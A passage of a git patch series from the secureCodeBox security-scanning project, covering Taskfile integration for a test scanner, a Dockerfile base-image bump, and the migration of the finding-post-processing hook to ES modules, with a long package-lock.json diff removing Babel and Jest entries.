101/137] remove unused helm args --- hooks/cascading-scans/Taskfile.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/hooks/cascading-scans/Taskfile.yaml b/hooks/cascading-scans/Taskfile.yaml index a7e3bdac86..2993f216e1 100644 --- a/hooks/cascading-scans/Taskfile.yaml +++ b/hooks/cascading-scans/Taskfile.yaml @@ -8,9 +8,6 @@ includes: - predeploy vars: hookName: cascading-scans - additionalHelmInstallArgsForScanner: | - --set="scanner.image.pullPolicy=IfNotPresent" \ - --set="nucleiTemplateCache.enabled=false" \ tasks: predeploy: From b08915326f2663081ed2845988d6b6ddf9f89c20 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:11:36 +0200 Subject: [PATCH 102/137] Add taskfile integration for test-scan --- scanners/test-scan/Taskfile.yaml | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100644 scanners/test-scan/Taskfile.yaml diff --git a/scanners/test-scan/Taskfile.yaml b/scanners/test-scan/Taskfile.yaml new file mode 100644 index 0000000000..9c38b8b7fc --- /dev/null +++ b/scanners/test-scan/Taskfile.yaml @@ -0,0 +1,10 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: test-scan + +tasks: {} From 256870e74f84c9ec8177db14ffc0b82a1139c8fb Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:11:45 +0200 Subject: [PATCH 103/137] Update test scan docker image --- scanners/test-scan/scanner/Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scanners/test-scan/scanner/Dockerfile b/scanners/test-scan/scanner/Dockerfile index f88199498e..95da799e08 100644 --- a/scanners/test-scan/scanner/Dockerfile +++ b/scanners/test-scan/scanner/Dockerfile @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -FROM alpine:3.11 +FROM alpine:3.22 RUN addgroup --system --gid 1001 test && adduser test --system --uid 1001 --ingroup test WORKDIR /home/securecodebox/ USER 1001 From 8230db95a1e6831f10d92527902833383aa4193c Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:16:49 +0200 Subject: [PATCH 104/137] Update finding post processing hook to esm and task --- .github/workflows/ci.yaml | 2 +- hooks/finding-post-processing/Taskfile.yaml | 21 + hooks/finding-post-processing/hook/hook.js | 7 +- .../finding-post-processing/hook/hook.test.js | 2 +- .../hook/package-lock.json | 6221 +---------------- .../finding-post-processing/hook/package.json | 4 +- .../finding-post-processing.test.js | 8 +- 7 files changed, 44 insertions(+), 6221 deletions(-) create mode 100644 hooks/finding-post-processing/Taskfile.yaml rename {tests/integration/hooks => hooks/finding-post-processing/integration-tests}/finding-post-processing.test.js (71%) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index c67d221ca8..3fdf364fd1 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -579,7 +579,7 @@ jobs: # - persistence-elastic # Fails on the CI due to insufficient cpu as mentioned in issue #1165 # - persistence-dependencytrack # - update-field-hook - # - finding-post-processing + - finding-post-processing # - notification # - persistence-static-report (WIP) steps: diff --git a/hooks/finding-post-processing/Taskfile.yaml b/hooks/finding-post-processing/Taskfile.yaml new file mode 100644 index 0000000000..00079c286b --- /dev/null +++ b/hooks/finding-post-processing/Taskfile.yaml @@ -0,0 +1,21 @@ +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + hookName: finding-post-processing + additionalHelmInstallArgsForHook: | + --set="rules[0].matches.anyOf[0].category=Host" \ + --set="rules[0].override.severity=high" \ + test-scan: + taskfile: ../../scanners/test-scan/Taskfile.yaml + +tasks: + predeploy: + cmds: + - task: test-scan:build + - task: test-scan:deploy \ No newline at end of file diff --git a/hooks/finding-post-processing/hook/hook.js b/hooks/finding-post-processing/hook/hook.js index ca6a9ba4a0..806c2c2a26 100644 --- a/hooks/finding-post-processing/hook/hook.js +++ b/hooks/finding-post-processing/hook/hook.js @@ -2,8 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const { isMatch, merge } = require("lodash"); -async function handle({ +import { isMatch, merge } from "lodash-es"; + +export async function handle({ getFindings, updateFindings, rules = JSON.parse(process.env["RULES"]), @@ -14,7 +15,7 @@ async function handle({ await updateFindings(res.findings); } } -module.exports.handle = handle; + /** * Goes through the Findings and the Finding Post Processing Rules * and applies the changes to the findings defined in the rules if matching diff --git a/hooks/finding-post-processing/hook/hook.test.js b/hooks/finding-post-processing/hook/hook.test.js index 8ef9265669..fbfac1ed32 100644 --- a/hooks/finding-post-processing/hook/hook.test.js +++ b/hooks/finding-post-processing/hook/hook.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook"); +import { handle } from "./hook"; test("Should Add High Severity and Description", async () => { const findings = [ diff --git a/hooks/finding-post-processing/hook/package-lock.json b/hooks/finding-post-processing/hook/package-lock.json index c29ab9f657..6b0acb282f 100644 --- a/hooks/finding-post-processing/hook/package-lock.json +++ b/hooks/finding-post-processing/hook/package-lock.json @@ -9,6217 +9,22 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "lodash": "^4.17.21" + "lodash-es": "^4.17.21" }, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } + "devDependencies": {} }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "dependencies": { - 